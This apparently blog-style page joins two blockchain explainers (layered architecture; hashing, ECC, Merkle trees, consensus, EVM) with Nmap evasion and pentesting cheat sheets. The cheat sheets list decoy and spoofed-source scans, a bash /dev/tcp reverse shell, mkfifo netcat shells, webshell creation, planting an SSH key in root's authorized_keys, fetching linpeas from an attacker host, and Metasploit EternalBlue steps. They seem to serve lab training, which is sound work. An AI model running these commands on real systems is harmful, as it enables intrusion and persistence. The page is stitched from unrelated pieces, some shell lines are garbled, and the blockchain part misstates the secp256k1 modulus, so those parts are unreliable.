Skip to content

2021

Understanding Blockchain Layers: Architecture, Responsibilities, and Major Implementations

Blockchain technology has evolved from a simple distributed ledger to a sophisticated multi-layered ecosystem. This layered approach has become essential to address the limitations of early blockchain implementations while maintaining their core benefits of security, decentralization, and transparency. The current date is Friday, March 14, 2025, and blockchain technology continues to mature with increasingly specialized layers working in harmony to support diverse applications across industries. This comprehensive exploration explains how blockchain layers function, their specific responsibilities, and examines the most significant blockchain networks operating across these layers.

The Layered Architecture of Blockchain Technology

Blockchain technology is organized as a stack of interconnected components, each performing specialized functions while working together as a cohesive system. This architecture can be visualized as a building where each floor serves a distinct purpose yet relies on the foundation for stability and support. The layered structure addresses fundamental blockchain challenges including scalability, interoperability, and user accessibility while preserving the essential security properties that make blockchain valuable. This approach enables blockchain networks to process more transactions, connect with other networks, and support complex applications beyond simple value transfers.

The modern blockchain ecosystem typically consists of multiple layers, with each layer building upon the functionality of those beneath it. The foundational infrastructure begins at Layer 0, followed by the core blockchain protocol at Layer 1, scaling solutions at Layer 2, and applications at Layer 3 and beyond. This architecture allows specialization at each level, with lower layers focusing on security and consensus while higher layers prioritize throughput, user experience, and specific use cases. As blockchain adoption increases, this layered approach has become crucial for meeting expanding demands without compromising the decentralized nature that defines blockchain technology.

Layer 0: The Foundational Infrastructure

Layer 0 serves as the underlying infrastructure upon which blockchain networks are built. This foundational layer encompasses the hardware, protocols, and connectivity frameworks that enable communication between distinct blockchain systems. Unlike the layers above it, Layer 0 focuses primarily on interoperability—enabling diverse blockchain networks to exchange information and value. This layer addresses the fundamental problem of blockchain isolation by creating standardized methods for cross-chain communication and data transfer.

The primary responsibility of Layer 0 is to provide the base-level protocols that allow different blockchains to interoperate effectively. This includes network connectivity, hardware infrastructure like servers and nodes, and the internet architecture that enables blockchains to function. Without Layer 0, blockchain networks would exist as isolated islands, unable to communicate with each other, limiting their collective utility and potential. By establishing common interoperability standards, Layer 0 creates a foundation for a more connected and versatile blockchain ecosystem that can support increasingly complex applications and services.

Notable examples of Layer 0 blockchains include Polkadot and Cosmos, both designed specifically to address interoperability challenges. Polkadot uses a sharded model where multiple blockchain "parachains" can connect to its relay chain, allowing them to communicate and share security. This approach enables specialized blockchains to focus on specific use cases while still benefiting from cross-chain integration. Similarly, Cosmos employs a hub-and-spoke model with its Inter-Blockchain Communication (IBC) protocol to connect multiple independent blockchains. Both networks demonstrate how Layer 0 infrastructure can unite otherwise disparate blockchain systems into a more cohesive and powerful ecosystem.

Layer 1: The Core Blockchain Protocol

Layer 1 represents the main blockchain protocol—the fundamental layer where transactions are validated, processed, and recorded on an immutable ledger. This layer implements the core consensus mechanisms, security protocols, and native cryptocurrency of a blockchain network. Layer 1 blockchains operate independently, maintaining their own network of nodes that collectively secure the system through mechanisms like Proof of Work (PoW) or Proof of Stake (PoS). The primary responsibility of Layer 1 is to provide a secure, decentralized foundation upon which additional functionality can be built.

Layer 1 blockchains handle essential functions including transaction validation, block creation, and maintaining consensus across the network. They establish the rules governing how new blocks are added to the chain and how conflicts are resolved. While Layer 1 protocols excel at security and decentralization, they often face limitations in transaction throughput and scalability. These limitations stem from the inherent trade-offs in blockchain design—achieving high security and decentralization typically comes at the cost of performance and efficiency. This "blockchain trilemma" has driven the development of additional layers to address these constraints while preserving the security benefits of the base layer.

Bitcoin and Ethereum stand as the most prominent examples of Layer 1 blockchains. Bitcoin, the original cryptocurrency, operates as a Layer 1 blockchain focused primarily on secure value transfer through its PoW consensus mechanism. While highly secure, Bitcoin's design limits it to approximately 7 transactions per second with relatively high fees during peak usage. Ethereum, another significant Layer 1 blockchain, expanded on Bitcoin's concept by introducing programmable smart contracts, enabling more complex applications. However, Ethereum has faced similar scalability challenges, processing around 15-30 transactions per second on its base layer, which has necessitated the development of Layer 2 scaling solutions.

Layer 2: The Scaling Solutions

Layer 2 refers to a collection of technologies built on top of existing Layer 1 blockchains to improve scalability, efficiency, and transaction throughput without compromising the security guarantees of the underlying protocol. These solutions process transactions off the main blockchain (off-chain) before eventually settling the final results back onto the base layer. By handling the majority of computational work away from the main chain, Layer 2 significantly reduces congestion, lowers transaction fees, and increases processing speed while inheriting the security properties of the Layer 1 blockchain.

The primary responsibility of Layer 2 is to overcome the limitations of Layer 1 blockchains by providing scalability solutions that maintain compatibility with existing protocols. Layer 2 solutions use various techniques including state channels, sidechains, and rollups to achieve this goal. State channels establish direct connections between users for conducting multiple transactions off-chain before settling the final state on the main blockchain. Sidechains operate as separate blockchains with their own consensus mechanisms but remain connected to the main chain. Rollups bundle multiple transactions together before submitting them to the main chain, distributing the gas fees across all included transactions to reduce costs per user.

Several notable Layer 2 solutions have gained prominence across different blockchain ecosystems. The Lightning Network represents Bitcoin's primary Layer 2 scaling solution, enabling fast and low-cost transactions through payment channels. Users can conduct numerous transactions through these channels without constantly recording them on the main Bitcoin blockchain, only settling the final state when the channel closes. For Ethereum, popular Layer 2 solutions include Arbitrum and Optimism, both implementing optimistic rollups that process transactions off-chain while posting transaction data to Ethereum for security. Another significant Ethereum scaling solution is Polygon, which functions as a sidechain with its own validator set while maintaining a connection to Ethereum for security and interoperability.

Layer 3: The Application Layer

Layer 3, commonly referred to as the application layer, hosts the user-facing applications and interfaces that interact with the underlying blockchain infrastructure. This layer bridges the technical capabilities of blockchains with practical real-world use cases, making the technology accessible to everyday users. Layer 3 encompasses decentralized applications (dApps), development frameworks, and API services that leverage the security and decentralization of lower layers while providing specific functionality for various industries and use cases.

The primary responsibility of Layer 3 is to deliver practical blockchain-based solutions that address real-world problems across different sectors. This layer transforms the abstract capabilities of blockchains into tangible applications with clear utility. Layer 3 applications span diverse domains including decentralized finance (DeFi), non-fungible token (NFT) marketplaces, gaming platforms, supply chain management systems, digital identity solutions, and governance frameworks. By providing intuitive interfaces and specific functionality, Layer 3 makes blockchain technology accessible to users who may not understand the underlying technical complexity.

The application layer hosts numerous innovative projects across various blockchain ecosystems. In the Ethereum ecosystem, prominent Layer 3 applications include decentralized exchanges like Uniswap, lending platforms like Aave, and NFT marketplaces like OpenSea. These applications leverage Ethereum's smart contract functionality to provide financial services without traditional intermediaries. Similarly, applications built on other Layer 1 blockchains, such as Solana's Serum DEX or Binance Smart Chain's PancakeSwap, demonstrate how Layer 3 applications can be optimized for specific blockchain environments. As blockchain technology continues to mature, Layer 3 applications increasingly focus on cross-chain functionality, allowing users to access services across multiple blockchain networks simultaneously.

Higher Layers and Emerging Infrastructure

Beyond the core three layers, blockchain architecture continues to evolve with higher layers focusing on specialized functions and cross-chain interactions. Layer 4 and above concentrate on user experience, advanced services, and integration with external systems. These higher layers aim to make blockchain technology more accessible to mainstream users by abstracting away technical complexity and providing seamless interfaces for interaction. As the blockchain ecosystem matures, these higher layers will play an increasingly important role in bridging the gap between specialized blockchain functionality and general-purpose applications.

The evolution of blockchain layers reflects the technology's progression from experimental prototypes to production-ready systems capable of supporting significant economic activity. New developments in Layer 0 protocols focus on enhancing interoperability between distinct blockchain networks, allowing for more seamless transfer of assets and information across previously isolated systems. Meanwhile, advancements in Layer 2 scaling solutions continue to push the boundaries of what's possible in terms of transaction throughput and cost efficiency. These developments collectively move the blockchain ecosystem toward greater utility, accessibility, and integration with existing economic systems.

How Blockchain Layers Work Together

The power of blockchain technology emerges from the harmonious interaction between its various layers, with each layer fulfilling a specialized role while supporting the overall system. Layer 0 provides the foundational infrastructure and interoperability protocols that allow different blockchains to communicate. Layer 1 establishes the secure and decentralized base upon which all other functionality depends. Layer 2 enhances scalability and efficiency through off-chain processing methods. Layer 3 delivers practical applications that connect blockchain capabilities to real-world use cases. Together, these layers form a cohesive ecosystem that balances security, scalability, and usability.

This layered approach allows blockchain technology to overcome the inherent limitations of earlier systems while preserving their fundamental benefits. Rather than forcing a single blockchain to handle all responsibilities—consensus, security, scalability, and application logic—the layered model distributes these functions across specialized components. This specialization enables optimizations at each level: Layer 1 can focus on security without compromising on decentralization, Layer 2 can prioritize performance without rebuilding consensus mechanisms from scratch, and Layer 3 can deliver intuitive user experiences without managing the underlying infrastructure. The result is a more robust, efficient, and versatile blockchain ecosystem capable of supporting increasingly complex applications.

Conclusion

The layered architecture of blockchain technology represents a sophisticated response to the challenges faced by early blockchain implementations. By distributing responsibilities across multiple specialized layers—from the foundational infrastructure of Layer 0 to the application-focused Layer 3—blockchain systems achieve a balance of security, scalability, and usability that would be impossible within a single-layer approach. Each layer makes distinct contributions to the overall ecosystem: Layer 0 enables cross-chain communication, Layer 1 provides security and consensus, Layer 2 delivers scalability and efficiency, and Layer 3 connects blockchain capabilities to practical applications.

Major blockchain networks have embraced this layered approach in different ways. Bitcoin focuses on security at Layer 1 while developing the Lightning Network at Layer 2 for everyday transactions. Ethereum maintains a robust smart contract platform at Layer 1 while supporting multiple Layer 2 scaling solutions like Arbitrum, Optimism, and Polygon. Meanwhile, Layer 0 protocols like Polkadot and Cosmos are building infrastructure for a multi-chain future where different blockchains can seamlessly interact. As blockchain technology continues to mature, this layered architecture will likely evolve further, with new innovations addressing emerging challenges and expanding the technology's capabilities across industries.

Building Blocks of Blockchain Technology: From Cryptographic Foundations to Smart Contract Ecosystems

Blockchain technology represents one of the most significant innovations in digital infrastructure over the past decade, combining advances in cryptography, distributed systems, and consensus mechanisms to create secure, transparent, and tamper-resistant networks. This technology has evolved from its original implementation in Bitcoin to support complex applications across various industries, from finance to supply chain management. The foundational elements of blockchain work in concert to enable trustless interactions in environments where participants may not inherently trust one another. This comprehensive analysis explores the core building blocks of blockchain technology, from its cryptographic underpinnings to its execution environments for smart contracts.

Cryptographic Foundations

Secure Hash Algorithms: SHA-3 and Keccak

The security of blockchain systems relies heavily on cryptographic hash functions, with SHA-3 (Secure Hash Algorithm 3) representing one of the most advanced implementations. Released by NIST in August 2015, SHA-3 is based on the Keccak cryptographic primitive family and represents a significant advancement in hash function design. Unlike its predecessors, SHA-3 employs a novel approach called the sponge construction, which consists of two primary phases: "absorbing" and "squeezing".

During the absorbing phase, message blocks are XORed into a subset of the state, followed by a transformation using a permutation function. In the squeezing phase, output blocks are read from the same subset of the state, alternated with the state transformation function. This architecture allows SHA-3 to process input data of any length and produce output of any desired length while maintaining strong security properties. The sponge construction's security level is determined by its capacity parameter, with the maximum security level being half the capacity.

SHA-3 also employs a specific padding mechanism using the pattern 10...01, ensuring that even if the original message length is divisible by the rate parameter, additional bits are added to prevent similar messages from producing identical hashes. This attention to detail in the algorithm's design prevents various cryptographic attacks that plagued earlier hash functions.

SHA3

Elliptic Curve Cryptography (ECC)

Elliptic Curve Cryptography forms the backbone of the public-private key infrastructure in many blockchain implementations, particularly Bitcoin. ECC utilizes the mathematical properties of elliptic curves over finite fields to generate cryptographically secure key pairs. The fundamental advantage of ECC lies in its asymmetric nature—it creates related points on a curve that are computationally simple to calculate in one direction but practically impossible to reverse-engineer.

Bitcoin specifically employs the secp256k1 curve, a Koblitz curve defined over a finite field of prime integers. The curve follows the formula y² = x³ + 7 mod (1.158 × 10^77). Unlike standard elliptic curves with random structures, secp256k1 was constructed with specific properties that enhance computational efficiency while maintaining security. The modular arithmetic used in these calculations works similarly to a clock, where after reaching a maximum value, the count cycles back to the beginning.

Elliptic Curve

This cryptographic foundation ensures that while anyone can derive a public key from a private key through relatively straightforward mathematical operations, the reverse process of determining the private key from a public key would require computational resources beyond what is practically available—effectively securing the digital assets and identities within the blockchain.

Merkle Trees

Merkle trees, named after Ralph Merkle who proposed them in 1987, represent a critical data structure within blockchain systems that enables efficient and secure verification of large datasets. Also known as binary hash trees, these structures organize data in a hierarchical format where each non-leaf node is a hash of its child nodes.

Merkle Trees

In blockchain implementations, transactions within a block are hashed individually, and these hashes are then paired and hashed again iteratively until a single hash—the Merkle root—is produced. This Merkle root is then incorporated into the block header, serving as a compact representation of all transactions within that block. The Bitcoin blockchain and many other distributed ledger systems utilize this approach to efficiently encode blockchain data while providing a mechanism for simple verification.

The primary advantage of Merkle trees lies in their ability to verify the inclusion of a specific transaction without requiring the entire blockchain. Through a process called Merkle proofs, a user can confirm that a particular transaction exists within a block by examining only a small subset of the tree's nodes, significantly reducing the computational and bandwidth requirements for verification. This property is particularly valuable in distributed systems where resources may be constrained and efficiency is paramount.

Distributed Systems Architecture

Decentralized Ledger Technology

At its core, blockchain functions as a distributed database system where data is stored in chronologically ordered blocks, each containing transactions, timestamps, and cryptographic references to previous blocks. Unlike traditional centralized databases managed by a single authority, blockchain distributes the ledger across a network of participants, each maintaining their own identical copy that is updated in real-time as new transactions are validated and added.

This architectural approach eliminates single points of failure and control, making the system highly resilient to outages and censorship attempts. Each participant in the network, often called a node, independently verifies the validity of new transactions according to the network's consensus rules before adding them to their local copy of the ledger. The distributed nature of blockchain databases creates an environment where trust is derived from the collective participation of the network rather than from any single entity.

The immutability of recorded data represents one of the most powerful features of blockchain's distributed architecture. Once information is committed to the blockchain and sufficient confirmation has occurred through the addition of subsequent blocks, altering that information would require simultaneously changing the records on the majority of nodes in the network—a practically impossible task in large, well-established blockchain networks.

Network Topology and Data Propagation

Blockchain networks operate as peer-to-peer systems where nodes connect directly with multiple other participants without requiring intermediary servers. This mesh-like topology ensures that even if some connections fail or some nodes go offline, the network continues to function through alternative paths. When a new transaction is initiated, it is broadcast to neighboring nodes, which verify its validity against their copy of the ledger before relaying it to their connections, creating a ripple effect that quickly propagates the information across the entire network.

Similarly, when new blocks are created through the consensus process, they are distributed throughout the network using the same peer-to-peer communication channels. This propagation mechanism ensures that all participants maintain synchronized copies of the ledger, with temporary inconsistencies quickly resolved as nodes adopt the longest valid chain according to the network's consensus rules.

The efficiency of data propagation represents a critical factor in blockchain performance, as delays can lead to increased rates of orphaned blocks (valid blocks that are ultimately discarded when longer chains are established) and potential temporary forks in the blockchain. Advanced blockchain networks implement sophisticated relay protocols that optimize the transmission of transaction and block data to minimize these issues.

Consensus Mechanisms

Principles of Consensus in Distributed Networks

Consensus mechanisms serve as the fundamental protocols that enable all participants in a blockchain network to agree on a single version of the truth without requiring a central authority. These mechanisms act as verification standards through which each blockchain transaction gains network-wide approval, ensuring that the distributed ledger remains consistent across all nodes despite potential disagreements or malicious actors.

At their core, consensus mechanisms are self-regulatory stacks of software protocols embedded in a blockchain's code that synchronize the network to maintain agreement on the state of the digital ledger. They establish rules for validating new transactions and blocks, determining which blocks are added to the chain, and resolving conflicts when multiple valid blocks are proposed simultaneously.

When a user attempts to process a transaction, nodes input this data, cross-check it against their records, and report back with an approval or disapproval status. For instance, if someone tries to spend previously used coins (a double-spending attempt), the transaction would be denied based on verification against the immutable ledger and confirmed by majority disapproval. This process ensures that only valid transactions that adhere to the network's rules are permanently recorded on the blockchain.

Different blockchain networks employ various consensus mechanisms, each with distinct advantages and trade-offs in terms of security, efficiency, and decentralization:

Proof of Work (PoW), famously used by Bitcoin, requires participants (miners) to solve computationally intensive mathematical puzzles to validate transactions and create new blocks. This mechanism provides strong security but consumes significant energy resources. In PoW systems, the chain with the most cumulative computational work is considered the valid blockchain, making attacks prohibitively expensive on established networks.

Proof of Stake (PoS), adopted by Ethereum after its "Merge" upgrade, selects validators to create new blocks based on the amount of cryptocurrency they hold and are willing to "stake" as collateral. Validators are incentivized to act honestly because they can lose their staked assets if they attempt to validate fraudulent transactions. This approach dramatically reduces energy consumption compared to PoW while maintaining security through economic incentives.

Delegated Proof of Stake (DPoS), implemented by blockchains like BNB Chain, allows token holders to vote for a limited number of delegates who are responsible for validating transactions and maintaining the network. This model increases transaction throughput but introduces some degree of centralization compared to pure PoS systems.

Byzantine Fault Tolerance (BFT) variants, including Practical Byzantine Fault Tolerance (PBFT) and Delegated Byzantine Fault Tolerance (dBFT), focus on achieving consensus even when some nodes in the network act maliciously or fail. These mechanisms typically require known validators and offer high transaction finality but may sacrifice some aspects of decentralization.

Tamper Prevention Mechanisms

Cryptographic Chaining and Immutability

Blockchain's resistance to tampering stems from its fundamental design, where each block contains a cryptographic hash of the previous block, creating an unbroken chain of references. This chaining mechanism ensures that altering any information in a block would change its hash, invalidating all subsequent blocks and making unauthorized modifications immediately apparent to network participants.

For an attacker to successfully tamper with blockchain data, they would need to not only modify the target block but also recalculate all subsequent blocks and convince the majority of the network to accept this alternative chain—a task that becomes exponentially more difficult as the chain grows longer. In proof-of-work systems, this would require controlling more than 50% of the network's total computational power, while in proof-of-stake systems, it would necessitate controlling a majority of the staked cryptocurrency.

The distributed nature of blockchain further enhances tamper resistance, as any attempted modification would need to occur simultaneously across a majority of nodes in the network. With potentially thousands of independent nodes maintaining copies of the ledger across different geographic locations and jurisdictions, coordinating such an attack becomes practically impossible for well-established blockchain networks.

Device and Software Integrity

Beyond protecting the ledger itself, blockchain technology offers powerful mechanisms for ensuring the integrity of connected devices and software—a critical consideration in the expanding Internet of Things (IoT) ecosystem. By using blockchain, device manufacturers can create tamper-proof records of all changes made to a device's firmware or software, making it easier to identify unauthorized modifications.

This approach allows for the creation of a verifiable chain of custody for device configurations and software updates. When a change is made to a device, the modification is recorded on the blockchain along with information about the responsible party and the timestamp. Any unauthorized changes would be immediately flagged during regular verification against the blockchain record, enabling rapid response to potential security breaches.

Smart contracts can further enhance this protection by automating the verification process and implementing predefined responses to detected tampering attempts. For instance, a smart contract could automatically disable certain device functionalities if unauthorized modifications are detected, or it could trigger alerts to system administrators and other stakeholders.

Smart Contracts and Execution Environments

The Ethereum Virtual Machine (EVM)

The Ethereum Virtual Machine represents a revolutionary advancement in blockchain technology, extending capabilities beyond simple value transfers to include complex programmable logic in the form of smart contracts. The EVM functions as a decentralized computer distributed across all nodes in the Ethereum network, providing a consistent execution environment that ensures identical results regardless of where the computation occurs.

As the central processing engine of the Ethereum blockchain, the EVM executes smart contract code compiled into a specialized bytecode format. Developers typically write smart contracts in high-level languages like Solidity, which are then compiled into EVM-compatible bytecode for deployment on the blockchain. When users interact with these contracts through transactions, validators add these transactions to new blocks, and each node in the network runs the EVM to execute the smart contract code contained within those blocks.

The EVM's design incorporates several key features that make it suitable for blockchain-based computation: it is deterministic, ensuring that the same input always produces the same output; it is isolated from the host system for security; and it operates with well-defined resource constraints to prevent infinite loops or excessive computation that could disrupt the network. This architecture creates a secure and predictable environment for executing contractual logic without requiring trust in any central authority.

Smart Contract Development and Applications

Smart contracts function as self-executing agreements with the terms directly written into code, automatically enforcing obligations when predefined conditions are met. These programs can manage digital assets, implement complex business logic, and facilitate interactions between multiple parties without requiring intermediaries.

The development of smart contracts typically follows a lifecycle that includes design, implementation, testing, deployment, and monitoring phases. Due to the immutable nature of blockchain, errors in smart contract code can have serious consequences, making thorough testing and formal verification critical steps in the development process. Tools like Hardhat, Truffle, and Remix provide integrated development environments specifically designed for smart contract creation and testing.

Smart Contract

Smart contracts have enabled a wide range of applications across various domains:

Decentralized Finance (DeFi) applications use smart contracts to implement financial instruments like lending platforms, decentralized exchanges, and yield optimization strategies without traditional financial intermediaries. These applications have created an entirely new financial ecosystem with billions of dollars in total value locked.

Non-Fungible Tokens (NFTs) rely on smart contracts to establish verifiable ownership and provenance for digital assets, revolutionizing digital art, collectibles, and virtual real estate markets.

Supply chain management systems leverage smart contracts to automate payments and transfers of ownership as goods move through different stages of production and distribution, increasing transparency and reducing administrative overhead.

Governance systems implement voting mechanisms through smart contracts, allowing token holders to participate directly in decision-making processes for decentralized autonomous organizations (DAOs).

EVM-Compatible Blockchains

The success of Ethereum's programmable blockchain model has inspired numerous other networks to adopt EVM compatibility, creating an expanding ecosystem of chains that support the same smart contract functionality with various trade-offs in terms of scalability, cost, and consensus mechanisms:

Polygon operates as an Ethereum scaling solution that offers significantly lower transaction fees and faster confirmation times while maintaining compatibility with Ethereum's tooling and smart contracts. By functioning as a sidechain with its own consensus mechanism, Polygon alleviates congestion on the Ethereum mainnet while preserving interoperability.

BNB Chain (formerly Binance Smart Chain) has established itself as one of the largest blockchains in terms of transaction volume and daily active users. Its EVM compatibility allows developers to easily port applications from Ethereum while benefiting from higher throughput and lower fees, though with some sacrifices in terms of decentralization.

Gnosis Chain (formerly xDai) functions as an Ethereum sidechain run by a community of over 100,000 validators, offering lower gas fees than the Ethereum mainnet while maintaining full compatibility with Ethereum's smart contract ecosystem.

Avalanche, Fantom, and other EVM-compatible chains implement various consensus mechanisms and architectural designs to achieve different balances between the blockchain trilemma of security, scalability, and decentralization, while still supporting the same smart contract functionality as Ethereum.

This proliferation of EVM-compatible chains has created a rich ecosystem where developers can deploy the same smart contract code across multiple networks, allowing users to choose the environment that best suits their specific requirements in terms of cost, speed, and security guarantees.

Conclusion

Blockchain technology represents a sophisticated convergence of cryptographic principles, distributed systems architecture, consensus mechanisms, and programmable logic that collectively create secure, transparent, and tamper-resistant platforms for digital interactions. From the foundational cryptographic elements like SHA-3, elliptic curve cryptography, and Merkle trees to the high-level applications enabled by smart contracts running on the Ethereum Virtual Machine and its compatible chains, each component plays a vital role in the overall ecosystem.

The distributed nature of blockchain networks, where multiple independent nodes maintain synchronized copies of the ledger, eliminates single points of failure and creates systems that are inherently resistant to censorship and manipulation. Consensus mechanisms ensure that these distributed participants can agree on a single version of truth without requiring central coordination, while cryptographic chaining provides powerful tamper-prevention guarantees that become stronger as the blockchain grows.

As blockchain technology continues to evolve, we see increasing specialization and optimization of different networks for specific use cases, from high-security value transfer to high-throughput decentralized applications. The growing ecosystem of EVM-compatible chains demonstrates how core innovations can be adapted and enhanced to address different priorities while maintaining interoperability. This combination of security, programmability, and adaptability positions blockchain technology as a fundamental infrastructure layer for the next generation of digital systems across finance, governance, supply chain management, and beyond.

NMAP Cheatsheet

Nmap's TCP ACK scan (-sA) method is much harder to filter for firewalls and IDS/IPS systems than regular SYN (-sS) or Connect scans (sT) because they only send a TCP packet with only the ACK flag. When a port is closed or open, the host must respond with an RST flag. Unlike outgoing connections, all connection attempts (with the SYN flag) from external networks are usually blocked by firewalls. However, the packets with the ACK flag are often passed by the firewall because the firewall cannot determine whether the connection was first established from the external network or the internal network.

Decoys There are cases in which administrators block specific subnets from different regions in principle. This prevents any access to the target network. Another example is when IPS should block us. For this reason, the Decoy scanning method (-D) is the right choice. With this method, Nmap generates various random IP addresses inserted into the IP header to disguise the origin of the packet sent. With this method, we can generate random (RND) a specific number (for example: 5) of IP addresses separated by a colon (:). Our real IP address is then randomly placed between the generated IP addresses. In the next example, our real IP address is therefore placed in the second position. Another critical point is that the decoys must be alive. Otherwise, the service on the target may be unreachable due to SYN-flooding security mechanisms.

Scan by Using Decoys Firewall and IDS/IPS Evasion forhau@htb[/htb]$ sudo nmap 10.129.2.28 -p 80 -sS -Pn -n --disable-arp-ping --packet-trace -D RND:5

Scan by Using Different Source IP Firewall and IDS/IPS Evasion forhau@htb[/htb]$ sudo nmap 10.129.2.28 -n -Pn -p 445 -O -S 10.129.2.200 -e tun0

DNS Proxying By default, Nmap performs a reverse DNS resolution unless otherwise specified to find more important information about our target. These DNS queries are also passed in most cases because the given web server is supposed to be found and visited. The DNS queries are made over the UDP port 53. The TCP port 53 was previously only used for the so-called "Zone transfers" between the DNS servers or data transfer larger than 512 bytes. More and more, this is changing due to IPv6 and DNSSEC expansions. These changes cause many DNS requests to be made via TCP port 53.

However, Nmap still gives us a way to specify DNS servers ourselves (--dns-server ,). This method could be fundamental to us if we are in a demilitarized zone (DMZ). The company's DNS servers are usually more trusted than those from the Internet. So, for example, we could use them to interact with the hosts of the internal network. As another example, we can use TCP port 53 as a source port (--source-port) for our scans. If the administrator uses the firewall to control this port and does not filter IDS/IPS properly, our TCP packets will be trusted and passed through.

SYN-Scan of a Filtered Port Firewall and IDS/IPS Evasion forhau@htb[/htb]$ sudo nmap 10.129.2.28 -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53

Scanning Options

Nmap Option Description
10.10.10.0/24 Target network range.
-sn Disables port scanning.
-Pn Disables ICMP Echo Requests
-n Disables DNS Resolution.
-PE Performs the ping scan by using ICMP Echo Requests against the target.
--packet-trace Shows all packets sent and received.
--reason Displays the reason for a specific result.
--disable-arp-ping Disables ARP Ping Requests.
--top-ports= Scans the specified top ports that have been defined as most frequent.
-p- Scan all ports.
-p22-110 Scan all ports between 22 and 110.
-p22,25 Scans only the specified ports 22 and 25.
-F Scans top 100 ports.
-sS Performs an TCP SYN-Scan.
-sA Performs an TCP ACK-Scan.
-sU Performs an UDP Scan.
-sV Scans the discovered services for their versions.
-sC Perform a Script Scan with scripts that are categorized as "default".
--script SCRIPT Performs a Script Scan by using the specified scripts.
-O Performs an OS Detection Scan to determine the OS of the target.
-A Performs OS Detection, Service Detection, and traceroute scans.
-D RND:5 Sets the number of random Decoys that will be used to scan the target.
-e Specifies the network interface that is used for the scan.
-S 10.10.10.200 Specifies the source IP address for the scan.
-g Specifies the source port for the scan.
--dns-server DNS resolution is performed by using a specified name server.

Output Options

Nmap Option Description
-oA filename Stores the results in all available formats starting with the name of "filename".
-oN filename Stores the results in normal format with the name "filename".
-oG filename Stores the results in "grepable" format with the name of "filename".
-oX filename Stores the results in XML format with the name of "filename".

Performance Options

Nmap Option Description
--max-retries Sets the number of retries for scans of specific ports.
--stats-every=5s Displays scan's status every 5 seconds.
-v/-vv Displays verbose output during the scan.
--initial-rtt-timeout 50ms Sets the specified time value as initial RTT timeout.
--max-rtt-timeout 100ms Sets the specified time value as maximum RTT timeout.
--min-rate 300 Sets the number of packets that will be sent simultaneously.
-T <0-5> Specifies the specific timing template.

Pentesting Cheatsheet

When engaging in cybersecurity activities, such as penetration testing or vulnerability assessment, having a comprehensive toolkit of commands and scripts is essential. The following list provides a collection of commonly used commands across various stages of a cybersecurity engagement, including service scanning, web enumeration, exploiting public vulnerabilities, managing shells, escalating privileges, and transferring files. These commands are crucial for identifying potential vulnerabilities, exploiting them, and maintaining access to systems. They cover tools like nmap for network scanning, gobuster for web directory enumeration, Metasploit for exploiting known vulnerabilities, and netcat for establishing reverse shells. Additionally, they include methods for privilege escalation and file transfer, which are vital for post-exploitation activities. By mastering these commands, cybersecurity professionals can efficiently navigate and analyze systems to identify and address security weaknesses.

Basic Tools

Command Description
sudo openvpn user.ovpn Connect to VPN
ifconfig/ip a Show our IP address
netstat -rn Show networks accessible via the VPN
ssh user@10.10.10.10 SSH to a remote server
ftp 10.129.42.253 FTP to a remote server
tmux
tmux Start tmux
ctrl+b tmux: default prefix
prefix c tmux: new window
prefix 1 tmux: switch to window (1)
prefix shift+% tmux: split pane vertically
prefix shift+" tmux: split pane horizontally
prefix -> tmux: switch to the right pane
Vim
vim file vim: open file with vim
esc+i vim: enter insert mode
esc vim: back to normal mode
x vim: Cut character
dw vim: Cut word
dd vim: Cut full line
yw vim: Copy word
yy vim: Copy full line
p vim: Paste
:1 vim: Go to line number 1.
:w vim: Write the file 'i.e. save'
:q vim: Quit
:q! vim: Quit without saving
:wq vim: Write and quit

Pentesting

Command Description
Service Scanning
nmap 10.129.42.253 Run nmap on an IP
nmap -sV -sC -p- 10.129.42.253 Run an nmap script scan on an IP
locate scripts/citrix List various available nmap scripts
nmap --script smb-os-discovery.nse -p445 10.10.10.40 Run an nmap script on an IP
netcat 10.10.10.10 22 Grab banner of an open port
smbclient -N -L \\10.129.42.253 List SMB Shares
smbclient \\10.129.42.253\users Connect to an SMB share
snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0 Scan SNMP on an IP
onesixtyone -c dict.txt 10.129.42.254 Brute force SNMP secret string
Web Enumeration
gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt Run a directory scan on a website
gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt Run a sub-domain scan on a website
curl -IL https://www.inlanefreight.com Grab website banner
whatweb 10.10.10.121 List details about the webserver/certificates
curl 10.10.10.121/robots.txt List potential directories in robots.txt
ctrl+U View page source (in Firefox)
Public Exploits
searchsploit openssh 7.2 Search for public exploits for a web application
msfconsole MSF: Start the Metasploit Framework
search exploit eternalblue MSF: Search for public exploits in MSF
use exploit/windows/smb/ms17_010_psexec MSF: Start using an MSF module
show options MSF: Show required options for an MSF module
set RHOSTS 10.10.10.40 MSF: Set a value for an MSF module option
check MSF: Test if the target server is vulnerable
exploit MSF: Run the exploit on the target server is vulnerable
Using Shells
nc -lvnp 1234 Start a nc listener on a local port
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1' Send a reverse shell from the remote server
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f /bin/sh -i 2>&1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f /bin/bash -i 2>&1
nc 10.10.10.1 1234 Connect to a bind shell started on the remote server
python -c 'import pty; pty.spawn("/bin/bash")' Upgrade shell TTY (1)
ctrl+z then stty raw -echo then fg then enter twice Upgrade shell TTY (2)
echo "" > /var/www/html/shell.php Create a webshell php file
curl http://SERVER_IP:PORT/shell.php?cmd=id Execute a command on an uploaded webshell
Privilege Escalation
./linpeas.sh Run linpeas script to enumerate remote server
sudo -l List available sudo privileges
sudo -u user /bin/echo Hello World! Run a command with sudo
sudo su - Switch to root user (if we have access to sudo su)
sudo su user - Switch to a user (if we have access to sudo su)
ssh-keygen -f key Create a new SSH key
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys Add the generated public key to the user
ssh root@10.10.10.10 -i key SSH to the server with the generated private key
Transferring Files
python3 -m http.server 8000 Start a local webserver
wget http://10.10.14.1:8000/linpeas.sh Download a file on the remote server from our local machine
curl http://10.10.14.1:8000/linenum.sh -o linenum.sh Download a file on the remote server from our local machine
scp linenum.sh user@remotehost:/tmp/linenum.sh Transfer a file to the remote server with scp (requires SSH access)
base64 shell -w 0 Convert a file to base64
echo f0VMR...SNIO...InmDwU base64 -d > shell
md5sum shell Check the file's md5sum to ensure it converted correctly

Foothold Cheatsheet

Initial Foothold

